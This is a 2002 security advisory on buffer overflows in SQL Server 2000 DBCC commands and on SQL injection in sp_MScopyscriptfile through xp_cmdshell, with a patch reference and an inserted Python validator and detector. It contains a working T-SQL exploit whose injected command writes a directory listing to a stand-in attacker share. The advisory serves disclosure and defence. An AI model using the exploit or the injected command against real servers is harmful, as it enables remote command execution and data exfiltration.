From: c c (cesarc56_at_UOL.COM.AR)
Date: Thu Jul 25 2002 - 15:50:00 CDT


    Security Advisory

    Name: SQL Server 2000 Buffer Overflows and SQL Injection vulnerabilities.
    System Affected: SQL Server 2000, all Service Packs.
    Severity: High.
    Author: Cesar Cerrudo.
    Date: 07/25/2002
    Advisory Number: CC070205

    Overview:
    Database Consistency Checkers (DBCCs) are command
    console utilities that allow maintenance and other
    operations to be performed on a SQL Server. Some of the
    DBCC functions are vulnerable to buffer overflows. The
    exploitation of these vulnerabilities could enable an
    attacker to run code in the context of the SQL Server
    service.
    Some stored procedures used in database replication are
    vulnerable to SQL injection. The exploitation of these
    vulnerabilities could enable an attacker to run OS
    commands with xp_cmdshell in the context of the SQL
    Server Agent Proxy account.

    Details:

    The following DBCC functions contain unchecked buffers:
    DBCC ADDEXTENDEDPROC ('xp_storedproc','XXX...') (a)
    DBCC INDEXFRAG ('','XXX...') (b)
    DBCC UPDATEUSAGE ('','XXX...') (c)
    DBCC CHECKCONSTRAINTS ('XXX...') (c)
    DBCC SHOWCONTIG ('XXX...') (d)
    DBCC CLEANTABLE ('','XXX...') (d)
    (a) Only members of sysadmin fixed server role can run
    this command.
    (b) Only members of sysadmin fixed server role,
    db_owner or db_ddladmin fixed database role can run
    this command.
    (c) Only members of sysadmin fixed server role or
    db_owner fixed database role can run this command.
    (d) All users can run this command.
    The buffer overflow in DBCC ADDEXTENDEDPROC affects SQL
    Server 7.0 too.

    sp_MScopyscriptfile is one of several stored procedures
    (not listed here for time reasons) vulnerable to SQL
    injection. sp_MScopyscriptfile creates a directory in
    the SQL Server replication directory and then copies a
    script file into it. It has one input parameter,
    scriptfile, which is the name of the script file to be
    copied. OS commands can be injected in that parameter
    and are then executed by xp_cmdshell.

    ---Code snip of sp_MScopyscriptfile stored procedure
    where the injection occurs---

    -- @scriptfile is concatenated into the command line
    -- without any validation or quoting of its contents
    select @cmd = N'copy "' + @scriptfile + N'" "' +
    @directory + N'"'
    exec @retcode = master..xp_cmdshell @cmd, NO_OUTPUT

    ----End code snip-----

    The SQL Server Agent Proxy account must be enabled to
    successfully exploit these SQL injection vulnerabilities;
    it is not enabled by default.
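    An added example, not part of the advisory or of SQL Server, that models the concatenation shown in the code snip in Python to demonstrate the two defensive checks a practitioner would want: an allowlist validation of the scriptfile parameter before it reaches any shell command, and a check over audited xp_cmdshell command lines that flags anything not shaped like a single plain copy. The path regex, the sample paths and all function names are assumptions.

```python
import re

# Characters the Windows command interpreter treats specially; a legitimate
# script file name needs none of them.
_METACHARS = re.compile(r'["|&<>^\r\n]')

# Constructed allowlist for a plain Windows path: drive letter, then
# backslash-separated components of word characters, space, dot, hyphen.
_PLAIN_PATH = re.compile(r'[A-Za-z]:\\(?:[\w .-]+\\)*[\w .-]+')


def build_copy_command(scriptfile: str, directory: str) -> str:
    """Mirror the concatenation in the advisory's snippet
    (select @cmd = N'copy "' + @scriptfile + N'" "' + @directory + N'"')
    with no validation, exactly as the vulnerable procedure does it."""
    return 'copy "' + scriptfile + '" "' + directory + '"'


def is_safe_scriptfile(scriptfile: str) -> bool:
    """Allowlist check to apply to the parameter before any concatenation.
    fullmatch avoids the '$' matches-before-trailing-newline trap; the
    metacharacter scan is a second, independent rejection."""
    return (_PLAIN_PATH.fullmatch(scriptfile) is not None
            and _METACHARS.search(scriptfile) is None)


def xp_cmdshell_line_is_suspicious(cmd: str) -> bool:
    """Detection over an audited xp_cmdshell command line (e.g. captured by
    SQL Profiler): flag it unless it is exactly one copy of one plain path
    into one plain path."""
    m = re.fullmatch(r'copy "([^"]*)" "([^"]*)"', cmd)
    if m is None:
        return True
    src, dst = m.groups()
    return not (is_safe_scriptfile(src) and is_safe_scriptfile(dst))


# Constructed inputs: a legitimate script file, and a parameter of the shape
# used in the advisory's exploit (closing quote, then pipe-separated commands)
# with the payload replaced by a placeholder.
BENIGN = r'C:\scripts\sync.sql'
INJECTED = r'c:\autoexec.bat > nul" | <placeholder command> | rd "'
REPL_DIR = r'C:\Program Files\Microsoft SQL Server\MSSQL\ReplData\unc\1'

if __name__ == "__main__":
    for name, value in (("benign", BENIGN), ("injected", INJECTED)):
        cmd = build_copy_command(value, REPL_DIR)
        print(name, "| safe param:", is_safe_scriptfile(value),
              "| flagged command line:", xp_cmdshell_line_is_suspicious(cmd))
```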

    Exploit :

    declare @command varchar(100)
    declare @scriptfile varchar(200)
    set concat_null_yields_null off
    select @command = 'dir c:\ > "\\attackerip\share\dir.txt"'
    select @scriptfile = 'c:\autoexec.bat > nul" | ' +
    @command + ' | rd "'
    exec sp_MScopyscriptfile @scriptfile, ''

    More Details:
    http://www.appsecinc.com/resources/alerts/mssql/02-0011.html

    Vendor Status :
    Microsoft was contacted; we worked together and Microsoft
    released a fix.

    Patch Available :
    http://www.microsoft.com/technet/security/bulletin/MS02-038.asp

    Thanks!:
    Special thanks to Aaron Newman (Application Security,
    Inc.) for his collaboration in testing.
